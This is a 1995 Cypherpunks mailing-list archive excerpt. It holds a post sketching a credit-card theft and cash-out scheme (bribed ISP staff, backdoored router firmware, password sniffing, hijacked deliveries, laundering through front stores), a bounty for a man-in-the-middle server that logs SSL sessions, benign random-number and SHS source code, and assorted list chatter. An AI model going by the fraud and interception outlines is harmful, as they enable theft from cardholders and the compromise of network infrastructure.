| Where good old phone banks with people and the net differ - is a single
| electronicly readable pipe of treasure outside the normal EFT security
| channels. This centralization of data is what makes it attractive *IF*
| you find a way to turn it into cash without getting caught or the risk of
| getting caught can be out wieghed by the gains.
| 
| How much can 5,000 credit cards be worth ... 1,000-3,000 each to the tune
| of say 10 million if you are thinking small. On a little bit more grand
| scale 10X or 100X is possible with some planning on how to get the money
| into a usable place. We are talking more money than can be obtained from
| even the biggest of bank or collectable roberies. I think that makes it
| a goal of atleast somebody out there ... if not an unknown cyber crook,
| organized crime, revolutionaries, some third world government.
| 
| Some planning is in order - how to plug into the pipe, how to get the
| money out. This is the fun part ;-)
| 
| We could probably afford to give say $50K to some college kid working for
| the regional ISP to find out a router passwd or two and share them with us.
| Maybe we are a little more discrete and simply put in a job application with
| them for the summer, or we by a few dozen very expensive routers and sell
| them cheap after installing a trap door in their firmware. Maybe we just
| do it the old fashion way and crack the root passwd on the interactive server
| and leave a background process watching /dev/nit for router passwds around
| the time we know they are going to do some reconfiguration.
| 
| Getting the money out is the real creative part.  Certainly running down
| and taking out cash advances is out of the question - or at least boring.
| We could do it the simple way - for each card in a targeted city, binary
| search it's limit by ordering various non-traceable comodities like Pentium
| CPU's, memory, jewlry, gold/silver coins for the card owners shipped to
| their homes - then hijack the FedX and UPS regional delivery trucks first
| thing in the morning. Since the goods are prepaid, it will probably take
| several days before they can figure out the magnitude of the deal. Probably
| time to do it a couple more times. Certainly doing say 50 at the same time
| could yield a diversified retirement income.
| 
| With out the glamour is more tried and true ways - hire a few hundred
| college kids to start a chain of computer software stores. Build volume
| by selling exactly at operating costs - undercutting everybody. When the
| bank gets used to the credit card rate, hold a few loss leader sales to
| create some greate peaks ... then dump the entire stolen credit card list
| spread out against all the stores over a week period - slamming the cash
| into places difficult to find and run like heck. With luck you may be able
| to shield your identity and be faceless after the fallout.
| 
| Take a large portion of the earnings to the track, powerball offices,
| and your local bookie ... REALLY HIDE the rest. If you get caught nobody
| will have the foggiest idea of how much is in your retirement fund
| after writing a best selling crime series in the slammer. Hopefully
| they will allow notebook computers and ISDN lines in cells by then.
| 
| Find your body double and do everything in their name and town -- that's
| FYI on the SLY of course ....
| 
| Unlike others, I have a strong dislike for centralized key databases, they
| make too big a target for traditional sorts of penitration - the data is
| worth thousands times more than you are likely to pay for it under the table.
| 
| I am a strong supporter of Public Key for both private and commerical data
| protection ... but you must be fully aware to protect the initial key. As
| used by most applications, the messenger attack is possible.
| 
| have fun, hope you enjoyed this series.
| 
| The Janitor :)






From jbass at dmsd.com  Sat Sep 30 12:10:47 1995
From: jbass at dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 12:10:47 PDT
Subject: NetScape's dependence upon RSA down for the count!
Message-ID: <9509301910.AA10970@dmsd.com>


Well guys and gals ...

I spent some time reading documentation on the www servers for NetScape
and Community ConneXion (c2.org).

The "messenger attack" as described in my earlier posts regarding
public key encryption and key management seems to apply to NetScape's SSL.
I have a Fifty dollar bill for the first person to submit to the mail box
nethack at dmsd.com a working Unix server (with cleartext session logs) which
accepts all connections on a unix based host to the www port and redirects
them to netscape.com leaving a clear text log of each session's SSL packets
in /tmp by session.  All entries become the property of DMS Design. The winner
and I will submit a claim for one of Community COnneXion's "I HACKED NETSCAPE"
tee shirts as a server hack. (Have Fun!!)

After a careful examination of NetScapes public documentation it appears
that SSL which is based upon RSA's public key technology may be down for the
count. The fall of SSL would doom NetScapes current claim of "Strong exhortable
cryptography for credit card-based financial transactions" as outlined
in Taher Elgamal's (NetScape's Chief Scientist) white paper titled
"COMMERCE ON THE INTERNET: CREDIT CARD PAYMENT APPLICATIONS OVER THE INTERNET"
Version 1.00 dated July 14, 1995 which can be found on the www as
http://home.netscape.com/newsref/std/credit.html. SSL doc can be found as
http://home.netscape.com/newsref/std/SSL.html.

John L. Bass
Owner, DMS Design






From shamrock at netcom.com  Sat Sep 30 12:11:37 1995
From: shamrock at netcom.com (Lucky Green)
Date: Sat, 30 Sep 95 12:11:37 PDT
Subject: COE Document
Message-ID: <199509301909.PAA11718@book.hks.net>


-----BEGIN PGP SIGNED MESSAGE-----

In article , banisar at epic.org ("Dave Banisar")
wrote:

Here are some thoughts.

[...]

>                        Recommendation No. R (95) 13

> Recommendations No. R (87) 15
> regulating the use of personal data in the police state and
> Recommendations No. R (89) 9 on computer-relating crime,

The countries of the EC are police states and admit to it in an official
doccument.

[...]

> 3. During execution of a search, investigating authorities should have the
> power, subject to appropriate safeguards, to extend the search of other
> computer systems within their jurisdiction which are connected by menas of
> a network and seize the data therein, provided immediate action is
> required.

If the computer to be searched is connected to the Internet, any other
computer connected to the Internet and located in the same country may be
searched as well without requiring a second warrant.

> 12. Specific obligations should be imposed on service providers who offer
> telecommunications services to the public, either through public or
> private networks, to provide information to identify the user, when so
> ordered by the compentant investigating authority.

Remailers will be outlawed.

[...]

> V. Use of Encryption 
> ---------------------
> 
> 14. Measures should be considered to minimise the negative effects of the
> use of cryptography on the investigation of criminal offenses, without
> affecting its legitimate use more than is strictly necessary.
GAK is comming.

The new world order is unmasked: a gobal police state. Folks, it is time
to buy some rifles and lots of ammunition. Oh, I forgot, over there in
Europe you can no longer buy any. Seems the political leaders have thought
ahead.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMG2V5SoZzwIn1bdtAQG5qQF/R3iX89TlU3rRD6NeIIVMG2F7iF6SNpME
6MjNUABjfCmGRwl6llCAC/bDtc2zxndA
=pXsk
-----END PGP SIGNATURE-----





From jbass at dmsd.com  Sat Sep 30 12:26:04 1995
From: jbass at dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 12:26:04 PDT
Subject: NetScape's dependence upon RSA down for the count!
Message-ID: <9509301925.AA11020@dmsd.com>



In case SSL packets are not available from NetScape homepage server,
use the netscape server of your choice in the contest ...

have fun,
John






From mab at crypto.com  Sat Sep 30 12:35:48 1995
From: mab at crypto.com (Matt Blaze)
Date: Sat, 30 Sep 95 12:35:48 PDT
Subject: my favorite random-numbers-in-software package (unix)
Message-ID: <199509301946.PAA15565@crypto.com>


About a week ago I posted my (Don Mitchell's really) truerand() routine
for Unix.  truerand() needs some post-processing before use; it cannot
be used directly.  Here's a more complete version; the main interface is
randbyte(), which returns (in about a third of a second) one really
random byte (based on 64 truerand() bits) that can be used directly.
As an added bonus, the library also throws in a shs-2 function and the
basic truerand() code.

The basic idea is that you exploit randomness in the drift between
the processor clock and the rate at which interval timer interrupts
occur.  Such drift occurs even on idle processors.  randbyte() assumes
that there's at least about .4 bits of "entropy" per interrupt, which is 
(probably) a safe assumption on modern processors.  Randomness introduced
by the OS (scheduler, etc.) can add to the overall entropy, but shouldn't
be relied upon by itself.

An advantage to this approach (using clock skew) is that the randomness
doesn't depend on external events like user input, network traffic or
processor load.  That makes it especially attractive for generating keys
on unattended servers, e.g., for generating Diffie-Hellman exponents.
Note, however, that very (very) slow and heavily-loaded processors may
not provide enough cycles to the truerand process between interrupts for
these assumptions to hold.  Also, all bets are off on processors that use
a single clock source for both interval timing and CPU clocking.

This code is very BSD/SunOS-centric and is completely untested elsewhere.

Read the comments for scary warnings about testing on your own platform
before using it for anything serious like generating keys.

-matt

=======================cut here==============
#!/bin/sh
# This is a shell archive (produced by GNU sharutils 4.1).
# To extract the files from this archive, save it to some FILE, remove
# everything before the `!/bin/sh' line above, then type `sh FILE'.
#
# Existing files will *not* be overwritten unless `-c' is specified.
#
# This shar contains:
# length mode       name
# ------ ---------- ------------------------------------------
#   1270 -rw-r--r-- makefile
#   1246 -rw-r--r-- randbyte.c
#   2886 -rw-r--r-- truerand.c
#   7142 -rw-r--r-- shs.c
#    149 -rw-r--r-- randtest.c
#
touch -am 1231235999 $$.touch >/dev/null 2>&1
if test ! -f 1231235999 && test -f $$.touch; then
  shar_touch=touch
else
  shar_touch=:
  echo
  echo 'WARNING: not restoring timestamps.  Consider getting and'
  echo "installing GNU \`touch', distributed in GNU File Utilities..."
  echo
fi
rm -f 1231235999 $$.touch
#
# ============= makefile ==============
if test -f 'makefile' && test X"$1" != X"-c"; then
  echo 'x - skipping makefile (file already exists)'
else
  echo 'x - extracting makefile (text)'
  sed 's/^X//' << 'SHAR_EOF' > 'makefile' &&
# makefile for librand
# tested on Sparc-20 (SunOS 4.x) and P100 (BSDI) only.
# You're on your own elsewhere.  Read the comments for scary warnings.
#
# Usage: int randbyte();
#
#* The authors of this software are Don Mitchell, Matt Blaze & Jack Lacy.
#*              Copyright (c) 1995 by AT&T.
#* Permission to use, copy, and modify this software without fee
#* is hereby granted, provided that this entire notice is included in
#* all copies of any software which is or includes a copy or
#* modification of this software and in all copies of the supporting
#* documentation for such software.
#*
#* This software may be subject to United States export controls.
#*
#* THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
#* WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
#* REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
X
SRCS=randbyte.c truerand.c shs.c
OBJS=randbyte.o truerand.o shs.o
CC=gcc
CFLAGS=
# No -O in CFLAGS! On some compilers, this optimizes out the counter...
X
librand.a: $(OBJS)
X	ar rcv librand.a $(OBJS)
X	ranlib librand.a
X
randtest: randtest.c $(SRCS)
X	cc -DDEBUGRND randtest.c $(SRCS) -o randtest
X
librand.shar: makefile $(SRCS) randtest.c
X	shar makefile $(SRCS) randtest.c > librand.shar
SHAR_EOF
  $shar_touch -am 0930150995 'makefile' &&
  chmod 0644 'makefile' ||
  echo 'restore of makefile failed'
  shar_count="`wc -c < 'makefile'`"
  test 1270 -eq "$shar_count" ||
    echo "makefile: original size 1270, current size $shar_count"
fi
# ============= randbyte.c ==============
if test -f 'randbyte.c' && test X"$1" != X"-c"; then
  echo 'x - skipping randbyte.c (file already exists)'
else
  echo 'x - extracting randbyte.c (text)'
  sed 's/^X//' << 'SHAR_EOF' > 'randbyte.c' &&
/*
X *	Random byte interface to truerand()
X *	Matt Blaze 5/95
X *	eight really random bits
X *	usage: 
X *		unsigned char r; int randbyte();
X *		r=randbyte();
X *	randbyte() takes about .3 seconds on most machines.
X */
/*
X * The author of this software is Matt Blaze.
X *              Copyright (c) 1995 by AT&T.
X * Permission to use, copy, and modify this software without fee
X * is hereby granted, provided that this entire notice is included in
X * all copies of any software which is or includes a copy or
X * modification of this software and in all copies of the supporting
X * documentation for such software.
X *
X * This software may be subject to United States export controls.
X *
X * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
X * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
X * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
X * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.
X */
X
int randbyte()
{
X	unsigned long truerand();
X	unsigned char *shs();
X	unsigned long r[2];
X	unsigned char *hash;
X
X	r[0]=truerand(); r[1]=truerand();
X	hash = shs(r,sizeof(r));
#ifdef DEBUGRND
X	printf("%011o %011o %02x\n",r[0],r[1],*hash & 0xff);
#endif
X	return ((int) (*hash)) & 0xff;
}
SHAR_EOF
  $shar_touch -am 0930145795 'randbyte.c' &&
  chmod 0644 'randbyte.c' ||
  echo 'restore of randbyte.c failed'
  shar_count="`wc -c < 'randbyte.c'`"
  test 1246 -eq "$shar_count" ||
    echo "randbyte.c: original size 1246, current size $shar_count"
fi
# ============= truerand.c ==============
if test -f 'truerand.c' && test X"$1" != X"-c"; then
  echo 'x - skipping truerand.c (file already exists)'
else
  echo 'x - extracting truerand.c (text)'
  sed 's/^X//' << 'SHAR_EOF' > 'truerand.c' &&
/*
X *	Physically random numbers (very nearly uniform)
X *	D. P. Mitchell 
X *	Modified by Matt Blaze 2/95
X */
/*
X * The authors of this software are Don Mitchell and Matt Blaze.
X *              Copyright (c) 1995 by AT&T.
X * Permission to use, copy, and modify this software without fee
X * is hereby granted, provided that this entire notice is included in
X * all copies of any software which is or includes a copy or
X * modification of this software and in all copies of the supporting
X * documentation for such software.
X *
X * This software may be subject to United States export controls.
X *
X * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
X * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
X * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
X * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.
X */
X
/*
X * WARNING: depending on the particular platform, truerand() output may
X * be biased or correlated.  In general, you can expect about 16 bits of
X * "pseudo-entropy" out of each 32 bit word returned by truerand(),
X * but it may not be uniformly diffused.  You should therefore run
X * the output through some post-whitening function (like MD5 or DES or
X * whatever) before using it to generate key material.  (RSAREF's
X * random package does this for you when you feed truerand() bits to the
X * seed input function.)
X *
X * Test these assumptions on your own platform before fielding a system
X * based on this software or these techniques.
X *
X * This software seems to work well (at 16 bits per truerand() call) on
X * a Sun Sparc-20 under SunOS 4.1.3 and on a P100 under BSDI 2.0.  You're
X * on your own elsewhere.
X */
X
#include 
#include 
#include 
#include 
#include 
X
static jmp_buf env;
static unsigned count;
static unsigned ocount;
static unsigned buffer;
X
static int
tick()
{
X	struct itimerval it, oit;
X
X	timerclear(&it.it_interval);
X	it.it_value.tv_sec = 0;
X	it.it_value.tv_usec = 16665;
X	if (setitimer(ITIMER_REAL, &it, &oit) < 0)
X		perror("tick");
}
X
static void
interrupt()
{
X	if (count)
X		longjmp(env, 1);
X	(void) signal(SIGALRM, interrupt);
X	tick();
}
X
static unsigned long
roulette()
{
X
X	if (setjmp(env)) {
X		count ^= (count>>3) ^ (count>>6) ^ ocount;
X		count &= 0x7;
X		ocount=count;
X		buffer = (buffer<<3) ^ count;
X		return buffer;
X	}
X	(void) signal(SIGALRM, interrupt);
X	count = 0;
X	tick();
X	for (;;)
X		count++;	/* about 1 MHz on VAX 11/780 */
}
X
unsigned long
truerand()
{
X
X	count=0;
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	return roulette();
}
X
int
n_truerand(n)
int n;
{
X	int slop, v;
X
X	slop = 0x7FFFFFFF % n;
X	do {
X		v = truerand() >> 1;
X	} while (v <= slop);
X	return v % n;
}
X
X
X
SHAR_EOF
  $shar_touch -am 0930143395 'truerand.c' &&
  chmod 0644 'truerand.c' ||
  echo 'restore of truerand.c failed'
  shar_count="`wc -c < 'truerand.c'`"
  test 2886 -eq "$shar_count" ||
    echo "truerand.c: original size 2886, current size $shar_count"
fi
# ============= shs.c ==============
if test -f 'shs.c' && test X"$1" != X"-c"; then
  echo 'x - skipping shs.c (file already exists)'
else
  echo 'x - extracting shs.c (text)'
  sed 's/^X//' << 'SHAR_EOF' > 'shs.c' &&
/*
X * The authors of this software are Jim Reeds and Jack Lacy
X *              Copyright (c) 1992, 1994 by AT&T.
X * Permission to use, copy, and modify this software without fee
X * is hereby granted, provided that this entire notice is included in
X * all copies of any software which is or includes a copy or
X * modification of this software and in all copies of the supporting
X * documentation for such software.
X *
X * This software may be subject to United States export controls.
X *
X * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
X * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
X * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
X * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.
X */
X
/*
X * Secure Hash Standard
X * proposed NIST SHS
X * coded for byte strings: number of bits is a multiple of 8
X *
X * Copyright (c) 1992, 1994 AT&T Bell Laboratories
X * Coded by Jim Reeds 5 Feb 1992
X * Enhanced by Jack Lacy 1993, 1994
X */
X
/*
X * unsigned char * shs(char *s, int n);
X *
X * input:  
X *                s character array to be hashed
X *                n length of s in BYTES
X * output:
X *                return value: address of 5 unsigned longs holding hash
X *
X * machine dependencies:
X *                assumes a char is 8 bits
X */
X
/*
X * passes test on:
X *                gauss (vax)
X *                3k (cray)
X *                slepian (MIPS)
X *                bird (sparcstation II)
X */
X
#include 
#include 
X
typedef struct {
X    long totalLength;
X    unsigned long h[5];
X    unsigned long w[80];
} SHS_CTX;
X
unsigned char *shs();
#ifdef SOLARIS2X
#define bzero(b, l)             memset(b, 0, l)
#define bcopy(s, d, l)          memcpy(d, s, l)
#define bcmp(s, d, l)           (memcmp(s, d, l)? 1 : 0)
#endif
X
static long nbits;
static unsigned long *h;
static unsigned long *w;
static void shs1();
/*
static void packl (unsigned long);
static void pack (unsigned char, unsigned char, unsigned char, unsigned char);
static void shs1(void);
static void opack(unsigned char);
*/
X
#define MASK        (unsigned long)0xffffffffL        /* in case more than 32 
bits per long */
X
/*
X * stick one byte into the current block; process the block when full
X */
static void opack(c)
X  unsigned char c;
{
X	int n32, nd32, shiftbits;
X	register unsigned long x, mask, y;
X	
X	nd32 = (int)(nbits >> 5);  /* nbits/32 */
X	n32 = (int)(nbits & 0x1f); /* nbits%32 */
X	shiftbits = 24-n32;
X	
X	x = (unsigned long)(c<> 5);
X	w[nd32] = (u_long)(((u_long)c0<<24) | ((u_long)c1<<16) | ((u_long)c2<<8) | 
(u_long)c3);
X	
X	nbits += 32;
X	if(nbits==512){
X		nbits = 0;
X		shs1();
X	}
}
X
/*
X * stick a 4 byte number into the current block
X */
static void
packl(x)
X  unsigned long x;
{
X	pack((unsigned char)(x>>24), (unsigned char)(x>>16),
X	     (unsigned char)(x>>8), (unsigned char)(x>>0));
}
X
/*
X * process one block
X */
static void
shs1()
{
X	unsigned long *wp;
X	unsigned long temp;
X	unsigned long A, B, C, D, E;
X	int t;
X	
#define S(n,x) (u_long)(((x)<<(n))|((MASK&(x))>>(32-(n))))
X	
X	wp = w;
X	t = 8;
X	do {
X		wp[16] = S(1, (u_long)(wp[13]^wp[8]^wp[2]^wp[0]));
X		wp[17] = S(1, (u_long)(wp[14]^wp[9]^wp[3]^wp[1]));
X		wp[18] = S(1, (u_long)(wp[15]^wp[10]^wp[4]^wp[2]));
X		wp[19] = S(1, (u_long)(wp[16]^wp[11]^wp[5]^wp[3]));
X		wp[20] = S(1, (u_long)(wp[17]^wp[12]^wp[6]^wp[4]));
X		wp[21] = S(1, (u_long)(wp[18]^wp[13]^wp[7]^wp[5]));
X		wp[22] = S(1, (u_long)(wp[19]^wp[14]^wp[8]^wp[6]));
X		wp[23] = S(1, (u_long)(wp[20]^wp[15]^wp[9]^wp[7]));
X		wp += 8;
X		t--;
X	} while (t > 0);
X	
X	A = h[0];
X	B = h[1];
X	C = h[2];
X	D = h[3];
X	E = h[4];
X	
X	t = 0;
X	while (t<20) {
X		temp = S(5,A) + E + w[t++];
X		temp += (unsigned long)0x5a827999L + ((B&C)|(D&~B));
X		E = D; D = C; C = S(30,B); B = A; A = temp;
X	}
X	while (t<40) {
X		temp = S(5,A) + E + w[t++];
X		temp += (unsigned long)0x6ed9eba1L + (B^C^D);
X		E = D; D = C; C = S(30,B); B = A; A = temp;
X	}
X	while (t<60) {
X		temp = S(5,A) + E + w[t++];
X		temp += (unsigned long)0x8f1bbcdcL + ((B&C)|(B&D)|(C&D));
X		E = D; D = C; C = S(30,B); B = A; A = temp;
X	}
X	while (t<80) {
X		temp = S(5,A) + E + w[t++];
X		temp += (unsigned long)0xca62c1d6L + (B^C^D);
X		E = D; D = C; C = S(30,B); B = A; A = temp;
X	}
X	h[0] = MASK&(h[0] + A);
X	h[1] = MASK&(h[1] + B);
X	h[2] = MASK&(h[2] + C);
X	h[3] = MASK&(h[3] + D);
X	h[4] = MASK&(h[4] + E);
}
X
#define CHARSTOLONG(wp,s,i) {*wp++ = (u_long)((((u_long)(s[i])&0xff)<<24)|(((u_
long)(s[i+1])&0xff)<<16)|(((u_long)(s[i+2])&0xff)<<8)|(u_long)(s[i+3]&0xff));}
X
X
void
shsInit(mdContext)
X  SHS_CTX *mdContext;
{
X	nbits = 0;
X	mdContext->h[0] = (unsigned long)0x67452301L;
X	mdContext->h[1] = (unsigned long)0xefcdab89L;
X	mdContext->h[2] = (unsigned long)0x98badcfeL;
X	mdContext->h[3] = (unsigned long)0x10325476L;
X	mdContext->h[4] = (unsigned long)0xc3d2e1f0L;
X	mdContext->totalLength = 0;
}
X
X
void
shsUpdate(mdContext, s, n)
X  SHS_CTX *mdContext;
X  unsigned char *s;
X  unsigned int n;
{
X	register unsigned long *wp;
X	long nn = n;
X	long i;
X	
X	w = mdContext->w;
X	h = mdContext->h;
X	mdContext->totalLength += n;
X	
X	nbits = 0;
X	n = n/(u_long)64;
X	wp = w;
X	
X	while(n>0){
X		CHARSTOLONG(wp,s,0);
X		CHARSTOLONG(wp,s,4);
X		CHARSTOLONG(wp,s,8);
X		CHARSTOLONG(wp,s,12);
X		CHARSTOLONG(wp,s,16);
X		CHARSTOLONG(wp,s,20);
X		CHARSTOLONG(wp,s,24);
X		CHARSTOLONG(wp,s,28);
X		CHARSTOLONG(wp,s,32);
X		CHARSTOLONG(wp,s,36);
X		CHARSTOLONG(wp,s,40);
X		CHARSTOLONG(wp,s,44);
X		CHARSTOLONG(wp,s,48);
X		CHARSTOLONG(wp,s,52);
X		CHARSTOLONG(wp,s,56);
X		CHARSTOLONG(wp,s,60);
X		n--;
X		wp = w;
X		s = (s + 64);
X		shs1();
X	}
X	i=nn%64;
X	while(i>3) {
X		CHARSTOLONG(wp,s,0);
X		s = (s + 4);
X		nbits += (u_long)32;
X		i -= 4;
X	}
X	while (i) {
X		opack((unsigned char)*s++);
X		i--;
X	}
}
X
void
shsFinal(mdContext)
X  SHS_CTX *mdContext;
{
X	long nn = mdContext->totalLength;
X	w = mdContext->w;
X	h = mdContext->h;
X	
X	opack(128);
X	while(nbits != 448)opack(0);
X	packl((unsigned long)(nn>>29));
X	packl((unsigned long)(nn<<3));
X	
X	/* if(nbits != 0)
X	   handle_exception(CRITICAL,"shsFinal(): nbits != 0\n");*/
}
X
unsigned char *
shs(s, n)
X  unsigned char *s;
X  long n;
{
X        SHS_CTX *mdContext;
X	static SHS_CTX mdC;
X	static unsigned char ret[20];
X	int i;
X	
X	mdContext = &mdC;
X
X	shsInit(mdContext);
X	shsUpdate(mdContext, s, n);
X	shsFinal(mdContext);
X	for (i=0; i<5; i++) {
X		ret[i*4] = (mdContext->h[i]>>24)&0xff;
X		ret[i*4+1] = (mdContext->h[i]>>16)&0xff;
X		ret[i*4+2] = (mdContext->h[i]>>8)&0xff;
X		ret[i*4+3] = (mdContext->h[i])&0xff;
X	}
X        
X	return ret;
}
X
/*int fread(char *, int, int, FILE *);*/
X
unsigned long *
fShsDigest(in)
X  FILE *in;
{
X	SHS_CTX *mdContext;
X	SHS_CTX mdC;
X	unsigned char buffer[1024];
X	long length, total;
X
X	mdContext = &mdC;
X	
X	bzero(buffer, 1024);
X
X	total = 0;
X	shsInit(mdContext);
X	while ((length = fread(buffer, 1, 1024, in)) != 0) {
X		total += length;
X		shsUpdate(mdContext, buffer, length);
X	}
X	shsFinal(mdContext);
X
X	return mdContext->h;
}
X
X
X
SHAR_EOF
  $shar_touch -am 0930142495 'shs.c' &&
  chmod 0644 'shs.c' ||
  echo 'restore of shs.c failed'
  shar_count="`wc -c < 'shs.c'`"
  test 7142 -eq "$shar_count" ||
    echo "shs.c: original size 7142, current size $shar_count"
fi
# ============= randtest.c ==============
if test -f 'randtest.c' && test X"$1" != X"-c"; then
  echo 'x - skipping randtest.c (file already exists)'
else
  echo 'x - extracting randtest.c (text)'
  sed 's/^X//' << 'SHAR_EOF' > 'randtest.c' &&
main(argc,argv)
int argc; char **argv;
{
X	int count;
X
X	if (argc==1)
X		count = 0;
X	else
X		count = atoi(argv[1]) + 1;
X	while (--count)
X		randbyte();
}
SHAR_EOF
  $shar_touch -am 0930150095 'randtest.c' &&
  chmod 0644 'randtest.c' ||
  echo 'restore of randtest.c failed'
  shar_count="`wc -c < 'randtest.c'`"
  test 149 -eq "$shar_count" ||
    echo "randtest.c: original size 149, current size $shar_count"
fi
exit 0







From jbass at dmsd.com  Sat Sep 30 12:39:36 1995
From: jbass at dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 12:39:36 PDT
Subject: NetScape's dependence upon RSA down for the count!
Message-ID: <9509301940.AA11065@dmsd.com>



and yes I'll accept server hacks which run's on linux and bsd too :)
John






From bplib at wat.hookup.net  Sat Sep 30 12:41:47 1995
From: bplib at wat.hookup.net (Tim Philp)
Date: Sat, 30 Sep 95 12:41:47 PDT
Subject: The 4th Estate
Message-ID: 



	I am a freelance journalist who has been 'lurking' on your list
for about six months now. I have a great interest in cryptography and the
mathematics behind cyphers. I write a weekly column about computers and
the Internet in a small town newspaper in Brantford Ontario. I was
particularly interested in the SSL crack that took place recently and I
wrote an article about the feat and talked about some of the implications
of this use of the Internet. 
	In previous articles I have spoken about the need for widespread,
strong, cryptography to both protect personal privacy and to aid secure
business communications. I have been following the debate about a 
Cypherpunk spokesperson with some interest and I thought that I would 
throw in my two cents worth (2.5 cents Canadian! :-})
	It is always difficult to get a group of strong individualists 
to agree to a common cause or to allow one person to become a spokesman 
for the group. Such a position grants a certain amount of 'power', for 
lack of a better word, to such a person. I think that there is no need 
for such a person. Each of us has a different point of view that, while 
sharing some common ideas, cannot be reconciled with any 'official' position.
	I think that the accomplishments of the group speak volumes and 
have no fear, the public is listening. I do, however, detect some small 
amount of smugness attached to comments about 'Joe Sixpack'. While it is 
true that the average citizen is not interested in esoteric subjects such 
as cryptography, do not underestimate the importance of communicating 
with them. Their votes and elected representatives will control the 
future legislation regarding cryptography. It is vital that they 
understand just what is at stake in this debate, and that they make 
decisions based upon knowledge and not upon fear.
	Therefore, it is important that we ALL do our share of 
communicating with the press and the public. Without our input, the 
scaremongerers will carry the day.
	In the meantime, keep up the good work. If anyone wants copies of 
the articles that appeared in the paper, E-mail me and I will send them. 
If there is enough demand I will post them to the list. Don't worry, 
they are only about 700 words each.

Regards, 

Tim Philp
Brantford, Ontario
Canada

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAy/KL1MAAAEEALIrcJLNr3LTauphCzkU1SNtZkUPCEH14xIxVaiSM/7850/y
6qkA17N0/4E20RiyQIZ7TZf2vpbaTHs88+jU4Lvb/fBWBnL1AZBdW7I1+vNSMGzG
ljBzU9X+BXrBFYi4CzpWhqOo+a2IQaJx4sZ7w/GG59gdFIyps3seeMISF+fVAAUR
tCBUaW0gUGhpbHAgPGJwbGliQG5pYy5ob29rdXAubmV0Pg==
=6Rrp
-----END PGP PUBLIC KEY BLOCK-----






From tcmay at got.net  Sat Sep 30 12:44:49 1995
From: tcmay at got.net (Timothy C. May)
Date: Sat, 30 Sep 95 12:44:49 PDT
Subject: Simple Hardware RNG Idea
Message-ID: 


At 5:57 PM 9/30/95, zinc wrote:

>regarding the use of radioactive material for generating random
>numbers, lantern mantles are fairly radioactive.  i'd say they would
>be able to emit sufficient particles for OTP use, especially if one
>builds a device that just constructs the pads all the time (ie, it
>just sits there making various pads of X min length and Y max length,
>storing them on a hard drive, or RAM if you're that rich).  you just
>request a pad from the machine when you need it and encrypt whatever
>with it...

Thorianated lantern mantles are only slightly radioactive. The counts per
second is what matters. This will be a function of a lot of things, not the
least of which is the detector area and the fluence of alphas intercepted.

At the risk of repeating myself, there are easier ways of generating
essentially random numbers.

--Tim May

(P.S., as my last word on this for a while. You may have heard that RAM
chips can have bits flipped by the alpha particles emitted by low levels of
uranium and thorium present in packaging materials. And that cosmic rays
can do the same thing, at a lower error rate. Well, I discovered these
effects in 1977 and wrote the original papers on this "soft error" effect.
I'm not making an appeal to authority here, just telling you why I'm
skeptical of all of these proposals to make a radioactive decay-based
random number source. There are much easier ways.)


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From alano at teleport.com  Sat Sep 30 12:57:28 1995
From: alano at teleport.com (Alan Olsen)
Date: Sat, 30 Sep 95 12:57:28 PDT
Subject: Operation Stop The Aliens
Message-ID: <199509302004.NAA11763@desiree.teleport.com>


At 09:11 AM 9/30/95 -0500, you wrote:
>-- [ From: FELIX R. WILSON SR. * EMC.Ver #2.3 ] --
> Attachment: natltr.txt Code: 00H7GFL   \ Created: 09-29-95, 06:21 PM [34 Kb]
>
>The Attached File Is For Viewing It I In Text Format Please Forward To
>Everyone on the net work. and post to every board " Please.." 
>//BEGIN BINARY MAIL SEGMENT:

What the hell is going on here!  Why am I suddenly seeing spam from every
nazi wannabe on the net?  Some of this crap has been posted to the
Cypherpunks list.  What kind of weird reputation do we have in the outside
world?  I would venture to guess that we have more anti-authoritatians here
than authoritarians.  Are these people that clueless (or stupid) to post
that crap here?  So far, I have been getting neo-nazi spam, Christian Nazi
spam, Libritarian nazi chain letter spam, and (why do I expect vikings to
desend from the ceiling) a whole lot more.  The next thing I expect to see
here is "evil aliens are stealing my luggage" spam.

I expect this bozo will have his account removed pretty quick...

Maybe we need a few national stories about the horrible things that happen
to people who spam mailing lists and newsgroups. ("Suddenly a wrecking crew
showed up at their house and leveled it to the ground.")

|  Minister of Forced Caffinization in the DNRC   | alano at teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
